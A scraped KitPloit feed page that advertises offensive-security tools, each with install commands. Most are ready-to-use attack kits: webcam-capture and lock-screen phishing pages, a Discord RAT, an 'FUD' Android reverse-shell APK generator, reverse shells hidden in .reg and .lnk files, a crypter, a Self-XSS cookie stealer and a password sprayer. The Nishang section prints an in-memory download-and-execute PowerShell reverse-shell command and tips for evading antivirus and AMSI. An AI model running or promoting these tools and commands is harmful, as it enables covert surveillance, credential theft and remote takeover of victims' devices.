Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Saycheese - Grab Target'S Webcam Shots By Link

$
0
0

Take webcam shots from target just sending a malicious link.

How it works?
The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.
The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.
See more about MediaDEvices.getUserMedia() here
To convince the target to grant permissions to access the cam, the page uses a javascript code made by https://github.com/wybiral that turns the favicon into a cam stream.

Installing (Kali Linux/Termux):
git clone https://github.com/thelinuxchoice/saycheese
cd saycheese
bash saycheese.sh



DalFox (Finder Of XSS) - Parameter Analysis And XSS Scanning Tool Based On Golang

$
0
0

Finder Of XSS, and Dal is the Korean pronunciation of moon.

What is DalFox
Just, XSS Scanning and Parameter Analysis tool. I previously developed XSpear, a ruby-based XSS tool, and this time, a full change occurred during the process of porting with golang!!! and created it as a new project. The basic concept is to analyze parameters, find XSS, and verify them based on DOM Parser.
I talk about naming. Dal(달) is the Korean pronunciation of moon and fox was made into Fox(Find Of XSS).

Key features
  • Paramter Analysis (find reflected parameter, find free/bad characters, Identification of injection point)
  • Static Analysis (Check Bad-header like CSP, X-Frame-optiopns, etc.. with base request/response base)
  • Optimization query of payloads
    • Check the injection point through abstraction and generated the fit payload.
    • Eliminate unnecessary payloads based on badchar
  • XSS Scanning and DOM Base Verifying
  • All test payloads(build-in, your custom/blind) are tested in parallel with the encoder.
    • Support to Double URL Encoder
    • Support to HTML Hex Encoder
  • Friendly Pipeline (single url, from file, from IO)
  • And the various options required for the testing :D
    • built-in / custom grepping for find other vulnerability
    • if you found, after action
    • etc..

How to Install
There are a total of three ways to Personally, I recommend go install.

Developer version (go-get or go-install)
go-install
  1. clone this repo
$ git clone https://github.com/hahwul/dalfox
  1. install in cloned dalfox path
$ go install
  1. using dalfox
$ ~/go/bin/dalfox
go-get
  1. go get dalfox!
$ go get -u github.com/hahwul/dalfox
  1. using dalfox
$ ~/go/bin/dalfox

Release version
  1. Open latest release page https://github.com/hahwul/dalfox/releases/latest
  2. Download file Download and extract the file that fits your OS.
  3. You can put it in the execution directory and use it. e.g
$ cp dalfox /usr/bin/

Usage
    _..._    .' .::::.   __   _   _    ___ _ __ __   :  :::::::: |  \ / \ | |  | __/ \\ V /   :  :::::::: | o ) o || |_ | _( o )) (   '. '::::::' |__/|_n_||___||_| \_//_n_\     '-.::''  Parameter Analysis and XSS Scanning tool based on golang  Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul      Usage:    dalfox [command]    Available Commands:    file        Use file mode(targets list or rawdata)    help        Help about any command    pipe        Use pipeline mode    url         Use single target mode    version     Show version    Flags:    -b, --blind string            Add your blind xss (e.g -b https://hahwul.xss.ht)        --config string           Using config from file    -C, --cookie string           Add custom cookie        --custom-payload string   Add custom payloads from file    -d, --data string             Using POST Method and add Body data        --delay int               Milliseconds between send to same host (1000==1s)        --found-action string     If found weak/vuln, action(cmd) to next        --grep string             Using custom grepping file (e.g --grep ./samples/sample_grep.json)    -H, --header string           Add custom headers    -h, --help                    help for dalfox        --only-discovery          Only testing parameter analysis    -o, --output string           Write to output file        --output-format string    -o/--output 's format (txt/json/xml)    -p, --param string            Only testing selected parameters        --proxy string            Send all request to proxy server (e.g --proxy http://127.0.0.1:8080)        --silence                 Not printing all logs        --timeout int             Second of timeout (default 10)        --user-agent string       Add custom UserAgent    -w, --worker int              Number of worker (default 40)  
    _..._
.' .::::. __ _ _ ___ _ __ __
: :::::::: | \ / \ | | | __/ \\ V /
: :::::::: | o ) o || |_ | _( o )) (
'. '::::::' |__/|_n_||___||_| \_//_n_\
'-.::''
Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul


Usage:
dalfox [command]

Available Commands:
file Use file mode(targets list or rawdata)
help Help about any command
pipe Use pipeline mode
url Use single target mode
version Show version

Flags:
-b, --blind string Add your blind xss (e.g -b https://hahwul.xss.ht)
--config string Using config from file
-C, --cookie string Add custom cookie
--custom-payload string Add custom payloads from file
-d, --data string Using POST Method and add Body data
--delay int Milliseconds between send to same host (1000==1s)
--found-action string If found weak/vuln, action(cmd) to next
--grep string Using custom grepping file (e.g --grep ./samples/sample_grep.json)
-H, --header string Add custom headers
-h, --help help for dalfox
--only-discovery Only testing parameter analysis
-o, --output string Write to output file
--output-format string -o/--output 's format (txt/json/xml)
-p, --param string Only testing selected parameters
--proxy string Send all request to proxy server (e.g --proxy http://127.0.0.1:8080)
--silence Not printing all logs
--timeout int Second of timeout (default 10)
--user-agent string Add custom UserAgent
-w, --worker int Number of worker (default 40)
Single target mode
$ dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff -b https://hahwul.xss.ht  
Multiple target mode from file
$ dalfox file urls_file --custom-payload ./mypayloads.txt  
Pipeline mode
$ cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"  
Other tips, See wiki for detailed instructions!

ScreenShot




Lockphish - A Tool For Phishing Attacks On The Lock Screen, Designed To Grab Windows Credentials, Android PIN And iPhone Passcode

$
0
0

Lockphish it's the first tool (05/13/2020) for phishing attacks on the lock screen, designed to grab Windows credentials, Android PIN and iPhone Passcode using a https link.

Features:

  • Lockscreen phishing page for Windows, Android and iPhone
  • Auto detect device
  • Port Forwarding by Ngrok
  • IP Tracker

Legal disclaimer:
Usage of Lockphish for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Usage:
git clone https://github.com/thelinuxchoice/lockphish
cd lockphish
bash lockphish.sh

Author: https://github.com/thelinuxchoice/lockphish
Twitter: https://twitter.com/linux_choice


DiscordRAT - Discord Remote Administration Tool Fully Written In Python

$
0
0

Discord Remote Administration Tool fully written in Python3.
This is a RAT controlled over Discord with over 20 post exploitation modules.

Disclaimer:
This tool is for educational use only, the author will not be held responsible for any misuse of this tool.
This is my first project on github as such this project is far from perfect , I will listen to any criticism as long as it is constructive.

Setup Guide:
You will first need to register a bot with the Discord developper portal and then add the bot to the server that you want. Once the bot is created copy the token of your bot and paste it at line 11.
Now on go on discord , go to the settings , go to appearance , scroll to the bottom , and activate "Developer Mode",now go to the server where your bot added right click on the channel where you want the bot to post , click copy ID and finally , paste the ID in the parenthesis in line 99.
Install requirements ("pip3 install -r requirements.txt")
Then if steps above were succesful after launching the python file, or executable , it will post a message on the server with a generated uuid , all that is left to do is posting "!interact " with the given uuid.
Now your bot should be available to use !
Requirements:
Python3,Windows
Compiling to exe (optional):
If you want to compile the bot to exe you can use PyInstaller.
Inside the directory of the bot execute "PyInstaller --onefile --noconsole DiscordRAT.py" or "python3 -m PyInstaller --onefile --noconsole DiscordRAT(NoCV).py (or DiscordRAT.py)"
If an error occured during compiling try to import the discord module "PyInstaller --onefile --noconsole --hidden-import=discord DiscordRAT.py"
Advice:
If you have problems with the installation of win32api or other modules , try installing it in a python virtual environment.
There are two python files one has opencv and webcam related modules the other does not, this has been done because open-cv adds multiple dozens of megabytes to the compiled .exe file.


Getdroid - FUD Android Payload And Listener

$
0
0

FUD Android Payload And Listener

Read the license before using any part from this code
Malicious Android apk generator (Reverse Shell)

Legal disclaimer:
Usage of GetDroid for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Requirements (Android-SDK, APKSinger) :
apt-get install android-sdk apksigner -y

Tested on Kali x86

Please, don't upload to VirusTotal, donate! Use https://antiscan.me

Usage:
git clone https://github.com/thelinuxchoice/getdroid
cd getdroid
bash getdroid.sh

Author: https://github.com/thelinuxchoice/getdroid
Twitter: https://twitter.com/linux_choice


URLBrute - Tool To Brute Website Sub-Domains And Dirs

$
0
0

What is this
URLBrute is a tool to help you brute forcing website sub-domains and dirs.
Can be used with python3 and python2.

Dependencies
  • urlbrute.py
    • requests>= 2.21.0
    • bs4>= 0.0.1
    • datetime>= 4.3

How to install
In Linux:
chmod +x install.sh
sudo ./install.sh
In Windows, install python 3.7, then run cmd as administrator:
install.bat

Credits
Credits to danTaler who created the wordlists.


Evilreg - Reverse Shell Using Windows Registry Files (.Reg)

$
0
0

Reverse shell using WindowsRegistry file (.reg).

Features:

Requirements:
  • Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup
  • Your authtoken is available on your dashboard: https://dashboard.ngrok.com
  • Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN>
  • Target must reboot/re-login after installing the .reg file

Legal disclaimer:
Usage of Evilreg for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/evilreg
cd evilreg
bash evilreg.sh

Author: github.com/thelinuxchoice
Twitter: twitter.com/linux_choice



Hidden-Cry - Windows Crypter/Decrypter Generator With AES 256 Bits Key

$
0
0

Windows Crypter/Decrypter Generator with AES 256 bits key

Features:
  • Works on WAN: Port Forwarding by Serveo.net
  • Fully Undetectable (FUD) -> Don't Upload to virustotal.com!

Legal disclaimer:
Usage of Hidden-Cry for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/hidden-cry
cd hidden-cry
apt-get update & apt-get install mingw-w64 -y
chmod +x hidden-cry
./hidden-cry

Author: github.com/thelinuxchoice
IG: instagram.com/linux_choice



ParamKit - A Small Library Helping To Parse Commandline Parameters

$
0
0

A small library helping to parse commandline parameters (for Windows).

Objectives
  • "like Python's argparse but for C/C++"
  • compact and minimalistic
  • easy to use
  • extendable

Demo
Print help for each parameter:


Easily store values of popular types, and verify if all required parameters are filled:


Verify if no invalid parameter was passed:


See the demo code


BADlnk - Reverse Shell In Shortcut File (.lnk)

$
0
0

Reverse Shell in Shortcut File (.lnk)

How it works?
Shortcut file (Microsoft Windows 9.x) LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file. LNK stands for LiNK. Shortcut files are used as a direct link to an executable file, instead of having to navigate to the executable. LNK files contain some basic properties, such as the path to the executable file and the “Start-In” directory. LNK files use a curled arrow to indicate they are shortcuts, and the file extension is hidden (even after disabling “Hide Extensions for Known File Types” in Windows Explorer). The script creates a .lnk file that points to the user's "cmd.exe" file (located in the default folder C:\Windows\System32\cmd.exe) to run a reverse shell through arguments.

Legal disclaimer:
Usage of BADlnk for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features:

Requirements:
  • Ngrok Authtoken (for TCP Tunneling): Sign up at: https://ngrok.com/signup
  • Your authtoken is available on your dashboard: https://dashboard.ngrok.com
  • Install your auhtoken: ./ngrok authtoken <YOUR_AUTHTOKEN>
  • Target must reboot/re-login after installing the .reg file

Usage:
git clone https://github.com/thelinuxchoice/badlnk
cd badlnk
bash badlnk.sh

Author: github.com/thelinuxchoice/badlnk
Twitter: twitter.com/linux_choice


Sharingan - Offensive Security Recon Tool

$
0
0

Sharingan is a recon multitool for offensive security / bug bounty
This is very much a work in progress and I'm relatively new to offensive security in general so if you see something that can be improved please open an issue or PR with suggested changes.

Cloning for development
Outside of your gopath git clone https://github.com/leobeosab/sharingan

Installing
go get github.com/leobeosab/sharingan/cmd/sharingancli

Dependencies
  • NMap
  • Go

Usage

Note
Order matters when it comes to flags it must be sharingancli [globalflags] command [commandflags] if this isn't a wanted feature I can change it but I like how clean it is

DNS

bruteforce
DNS busts the target with a wordlist you provide
sharingancli --target targetname dns --dns-wordlist ~/path/to/wordlist --root-domain target.com


addsubs
Adds subdomains to the program's storage from stdin using pipes
cat subs | sharingancli --target targetname dns addsubs

Scan
Scans all hosts available that were stored in target using nmap
sharingancli --target target scan


interactive
Scan a single host from list of subdomains stored in target
sharingancli --target target scan interactive


info

domains
Outputs all domains as a list in stdout
sharingancli --target target info domains


Features to come
  • Dir brute forcing -- Currently being worked on
  • JSON and regular file exports
  • Automated scans through a daemon?
  • add a way to do SYN / -sS scanning [ must be root so it presents a challenge ]
  • Possible Web ui / html export


BlackDir-Framework - Web Application Vulnerability Scanner

$
0
0

Web Application Vulnerability Scanner.

  1. Spider Directories
  2. Find Sub Domain
  3. Advanced Dorks Search
  4. Scan list of Dorks
  5. Scan WebSites [Xss,Sql]
  6. Reverse Ip Lookup
  7. Port Scan

Installation:
git clone https://github.com/RedVirus0/BlackDir-Framework.git
cd BlackDir
pip3 install -r requirements.txt
python3 BlackDir.py





Open Sesame - A Tool Which Runs To Display Random Publicly Disclosed Hackerone Reports When Bored

$
0
0

A python tool which runs to display random publicly disclosed Hackerone reports when bored. Automatically opens the report in browser.
Contains Over 8k Publicly disclosed Hackerone reports and addtl. wordlist of ~700 bug bounty writeups.
This is a productivity tool for security enthusiasts and bug bounty hunters. I have written a blog here giving my idea of how to use this efficiently.
Launching Open Sesame!


Additional features include:
  • Opening URL from custom wordlist which has bug bounty writeups.
  • Fetching and Updating the newly disclosed Hackerone publicly disclosed reports.

Usage:
Pl install components in rquirements.txt
python3 default.py Opens a random magic URL from the collection of publicly disclosed h1 reports.



python3 default.py --custom Opens a random magic URL from the collection of custom wordlist having bug bounty writeups.


python3 default.py --refresh Refreshes and adds newly publicly disclosed h1 reports to your file(final.txt)


Known Issues
  • The ability of not able to distinguish between completely publicly disclosed reports and reports with limited disclosures.
  • The tool may break in the way of how it works if it gets run after a long time. The default range specified is scraping 10 pages to reduce load on the site. If you believe you are running it after a long time, consider increasing the range upto 50 in main for loop in refresh.py before running. This will enable collecting all the reports till the recent report extracted in the final.txt.

Thanks
  • h1.nobbd(dot)de
  • bugreader(dot)com
  • Awesome-Bugbounty-Writeups Repo
  • and other helpful sources.. :)


Self-XSS - Self-XSS Attack Using Bit.Ly To Grab Cookies Tricking Users Into Running Malicious Code

$
0
0

Self-XSS attack using bit.ly to grab cookies tricking users into running malicious code

How it works?
Self-XSS is a social engineering attack used to gain control of victims' web accounts by tricking users into copying and pasting malicious content into their browsers. Since Web browser vendors and web sites have taken steps to mitigate this attack by blocking pasting javascript tag, I figure out a way of doing that using Bit.ly, so we can create a redirect pointing to "website.com/javascript:malicious_code". If the user is tricked to run the javascript code after "website.com/" the cookies of its authenticated/logged session of website.com will be sent to the attacker.


Features:
Port Forwarding using Ngrok and shortner using Bitly.com (Register for free)

Requirement
https://bitly.com account (Register for free)

Legal disclaimer:
Usage of Self-XSS for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/self-xss
cd self-xss
bash self-xss.sh

Author: https://github.com/thelinuxchoice/self-xss
Twitter: https://twitter.com/linux_choice


Spray - A Password Spraying Tool For Active Directory Credentials By Jacob Wilkin(Greenwolf)

$
0
0

A Password Spraying tool for Active DirectoryCredentials by Jacob Wilkin(Greenwolf)

Getting Started
These instructions will show you the requirements for and how to use Spray.

Prerequisites
All requirements come preinstalled on Kali Linux, to run on other flavors or Mac just make sure curl(owa & lync) and rpcclient(smb) are installed using apt-get or brew.
rpcclient
curl

Using Spray
This script will password spray a target over a period of time It requires password policy as input so accounts are not locked out
Accompanying this script are a series of hand crafted password files for multiple languages. These have been crafted from the most common active directory passwords in various languages and all fit in the complex (1 Upper, 1 lower, 1 digit) catagory.

SMB
To password spray a SMB Portal, a userlist, password list, attempts per lockout period, lockout period length and the domain must be provided
Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
Optionally Skip Username%Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS skipuu

OWA
To password spray an OWA portal, a file must be created of the POST request with the Username: sprayuser@domain.com, and Password: spraypassword
Useage: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
Example: spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt

Lync
To password spray a lync service, a lync autodiscover url or a url that returns the www-authenticate header must be provided along with a list of email addresses
Useage: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35
Example: spray.sh -lync https://lyncweb.spiderlabs.com/Autodiscover/AutodiscoverService.svc/root/oauth/user users.txt passwords.txt 1 35

CISCO Web VPN
To password spray a CISCO Web VPN service, a target portal or server hosting a portal must be provided
Useage: spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -ciso 192.168.0.1 usernames.txt passwords.txt 1 35

Password List Update
It is also possible to update the supplied 2016/2017 password list to the current year
Useage: spray.sh -passupdate <passwordList>
Example: spray.sh -passupdate passwords.txt
An optional company name can also be provided to add to the list
Useage: spray.sh -passupdate <passwordList> <CompanyName>
Example: spray.sh -passupdate passwords.txt Spiderlabs

Username generation
A username list can also be generated from a list of common names
Useage: spray.sh -genusers <firstnames> <lastnames> "<<fi><li><fn><ln>>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fi><ln>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fn>.<ln>"

Authors

License
Spray Created by Jacob Wilkin Copyright (C) 2017 Trustwave Holdings, Inc.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

Acknowledgments



Web Hacker's Weapons - A Collection Of Cool Tools Used By Web Hackers

$
0
0

A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting.

Weapons
TypeNameDescription
Army-Knife/ALLBurpSuitethe BurpSuite project
Army-Knife/SCANjaelesThe Swiss Army knife for automated Web Application Testing
Army-Knife/ALLzaproxyThe OWASP ZAP core project
Discovery/ALLOneForAllOneForAll是一款功能强大的子域收集工具
Discovery/ALLlazyreconThis script is intended to automate your reconnaissance process in an organized fashion
Discovery/CRAWLPhotonIncredibly fast crawler designed for OSINT.
Discovery/CRAWLcc.pyExtracting URLs of a specific target based on the results of "commoncrawl.org"
Discovery/CRAWLgospiderGospider - Fast web spider written in Go
Discovery/CRAWLhakrawlerSimple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
Discovery/DNSDNSDumpsterOnline dns recon & research, find & lookup dns records
Discovery/DNSSecurityTrailsOnline dns / subdomain / recon tool
Discovery/DNSdnsprobeDNSProb (beta) is a tool built on top of retryabledns that allows you to perform multiple dns queries of your choice with a list of user supplied resolvers.
Discovery/DNShakrevdnsSmall, fast tool for performing reverse DNS lookups en masse.
Discovery/DNSshufflednsshuffleDNS is a wrapper around massdns written in go that allows you to enumerate valid subdomains using active bruteforce as well as resolve subdomains with wildcard handling and easy input-output support.
Discovery/DOMAINAmassIn-depth Attack Surface Mapping and Asset Discovery
Discovery/DOMAINSublist3rFast subdomains enumeration tool for penetration testers
Discovery/DOMAINaltdnsGenerates permutations, alterations and mutations of subdomains and then resolves them
Discovery/DOMAINassetfinderFind domains and subdomains related to a given domain
Discovery/DOMAINfindomainThe fastest and cross-platform subdomain enumerator, do not waste your time.
Discovery/DOMAINknockKnock Subdomain Scan
Discovery/DOMAINsubfinderSubfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
Discovery/FUZZParamSpiderMining parameters from dark corners of Web Archives
Discovery/FUZZdirsearchWeb path scanner
Discovery/FUZZgobusterDirectory/File, DNS and VHost busting tool written in Go
Discovery/GITGitMinerTool for advanced mining for content on Github
Discovery/GITgitGrabergitGraber
Discovery/GITgithub-searchTools to perform basic search on GitHub.
Discovery/GITgitrobReconnaissance tool for GitHub organizations
Discovery/HTTPArjunHTTP parameter discovery suite.
Discovery/PORTShodanWorld's first search engine for Internet-connected devices
Discovery/PORTmasscanTCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
Discovery/PORTnaabuA fast port scanner written in go with focus on reliability and simplicity. Designed to be used in combination with other tools for attack surface discovery in bug bounties and pentests
Discovery/PORTnmapNmap - the Network Mapper. Github mirror of official SVN repository.
Discovery/TKOVsubjackSubdomain Takeover tool written in Go
Discovery/URLwaybackurlsFetch all the URLs that the Wayback Machine knows about for a domain
Discovery/VULNSilverMass scan IPs for vulnerable services
Fetch/TOMhttprobeTake a list of domains and probe for working HTTP and HTTPS servers
Fetch/TOMmegFetch many paths for many hosts - without killing the hosts
Fetch/WSOCKwebsocket-connection-smugglerwebsocket-connection-smuggler
Scanner/CORSCorsyCORS Misconfiguration Scanner
Scanner/FUZZMedusaAutomatic Video Library Manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic.
Scanner/FUZZVHostScanA virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
Scanner/FUZZffufFast web fuzzer written in Go
Scanner/FUZZthc-hydrahydra
Scanner/FUZZwfuzzWeb application fuzzer
Scanner/GQLGraphQLmapGraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
Scanner/LFILFISuiteTotally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
Scanner/LFIdotdotpwnDotDotPwn - The Directory Traversal Fuzzer
Scanner/NOSQLNoSQLMapAutomated NoSQL database enumeration and web application exploitation tool.
Scanner/RECONOsmedeusFully automated offensive security framework for reconnaissance and vulnerability scanning
Scanner/RECONSn1perAutomated pentest framework for offensive security experts
Scanner/RECONmegplusAutomated reconnaissance wrapper — TomNomNom's meg on steroids. [DEPRECATED]
Scanner/S3S3ScannerScan for open AWS S3 buckets and dump the contents
Scanner/SQLSQLNinjaSQL Injection scanner
Scanner/SQLsqlmapAutomatic SQL injection and database takeover tool
Scanner/SSLa2svAuto Scanning to SSL Vulnerability
Scanner/SSLtestssl.shTesting TLS/SSL encryption anywhere on any port
Scanner/SSRFSSRFmapAutomatic SSRF fuzzer and exploitation tool
Scanner/SSRFssrf-sheriffA simple SSRF-testing sheriff written in Go
Scanner/WPwpscanWPScan is a free, for non-commercial use, black box WordPress Vulnerability Scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
Scanner/WVSStrikerStriker is an offensive information and vulnerability scanner.
Scanner/WVSarachniWeb Application Security Scanner Framework
Scanner/WVSniktoNikto web server scanner
Scanner/WVSrapidscanThe Multi-Tool Web Vulnerability Scanner.
Scanner/WVSzap-cliA simple tool for interacting with OWASP ZAP from the commandline.
Scanner/XSSXSStrikeMost advanced XSS scanner.
Scanner/XSSXSpearPowerfull XSS Scanning and Parameter analysis tool&gem
Scanner/XSSdalfox DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
Scanner/XSSezXSSezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Scanner/XSSxsserCross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
Utility/CSPCSP EvaluatorOnline CSP Evaluator from google
Utility/ENVGf-PatternsGF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic) parameters grep
Utility/ENVrecon_profileRecon profile (bash profile) for bugbounty
Utility/ETCPhoenixhahwul's online tools
Utility/FINDfzfA command-line fuzzy finder
Utility/FLOWSequenceDiagramOnline tool for creating UML sequence diagrams
Utility/GREPgfA wrapper around grep, to help you grep for things
Utility/JSONgronMake JSON greppable!
Utility/PAYLOADPayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF
Utility/S3s3reverseThe format of various s3 buckets is convert in one format. for bugbounty and security testing.
Utility/SHOTgowitness gowitness - a golang, web screenshot utility using Chrome Headless
Utility/TEMPLATEbountyplzAutomated security reporting from markdown templates (HackerOne and Bugcrowd are currently the platforms supported)
Utility/TEMPLATEtemplate-generatorA simple variable based template editor using handlebarjs+strapdownjs. The idea is to use variables in markdown based files to easily replace the variables with content. Data is saved temporarily in local storage. PHP is only needed to generate the list of files in the dropdown of templates.
Utility/URLanewA tool for adding new lines to files, skipping duplicates
Utility/URLburlA Broken-URL Checker
Utility/URLgauFetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
Utility/URLhacksremove bad urls
Utility/URLqsreplaceAccept URLs on stdin, replace all query string values with a user-supplied value
Utility/URLunfurlPull out bits of URLs provided on stdin
Utility/VULNGopherusThis tool generates gopher link for exploiting SSRF and gaining RCE in various servers
Utility/VULNoxml_xxeA tool for embedding XXE/XML exploits into different filetypes
Utility/VULNpentest-toolsCustom pentesting tools
Utility/VULNpostMessage-trackerA Chrome Extension to track postMessage usage (url, domain and stack) both by logging using CORS and also visually as an extension-icon
Utility/VULNysoserialA proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Utility/WORDSecListsSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Contribute

Usage of add-tool
./add-tool
Usage of ./add-tool:
-isFirst
if you add new type, it use
-url string
any url

Three Procedures for the Contribute
  • First, your tool append data.json using `add-tool
$ ./add-tool -url https://github.com/sqlmapproject/sqlmap
Successfully Opened type.lst
[0] Army-Knife
[1] Discovery
[2] Fetch
[3] Scanner
[4] Utility
[+] What is type?
3
Scanner
[+] What is method(e.g XSS, WVS, SSL, ETC..)?
SQL
Successfully Opened data.json
  • Second, Give me PR or Add issue with data.json
  • Third, There's no third.

Add common tools
in WebHackersWeapons directory
$ ./add-tool -url https://github.com/hahwul/s3reverse

Add Burp Suite or ZAP Extensions
in WebHackersWeapons/Burp and ZAP Extensions directory
$ ../add-tool -url https://github.com/nccgroup/BurpSuiteLoggerPlusPlus

Asciinema video


Distribute (for me)

Distribute to common tools
$ ./distribute-readme
=> show new README file

Distribute to Burp Suite or ZAP Extensions
$ ../distribute-readme
=> show new README file in Burp Suite or ZAP Extensions

Thanks to (Contributor)
six2dez , si9int


Nishang - Offensive PowerShell For Red Team, Penetration Testing And Offensive Security

$
0
0

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
By nikhil_mitt

Usage
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information
To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
Method 2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".
Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Scripts
Nishang currently contains the following scripts and payloads.

ActiveDirectory
Set-DCShadowPermissions
Modify AD objects to provide minimal permissions required for DCShadow.

Antak - the Webshell
Antak
Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.

Backdoors
HTTP-Backdoor
A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
DNS_TXT_Pwnage
A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
Execute-OnTime
A backdoor which can execute PowerShell scripts at a given time on a target.
Gupt-Backdoor
A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
Add-ScrnSaveBackdoor
A backdoor which can use Windows screen saver for remote command and script execution.
Invoke-ADSBackdoor
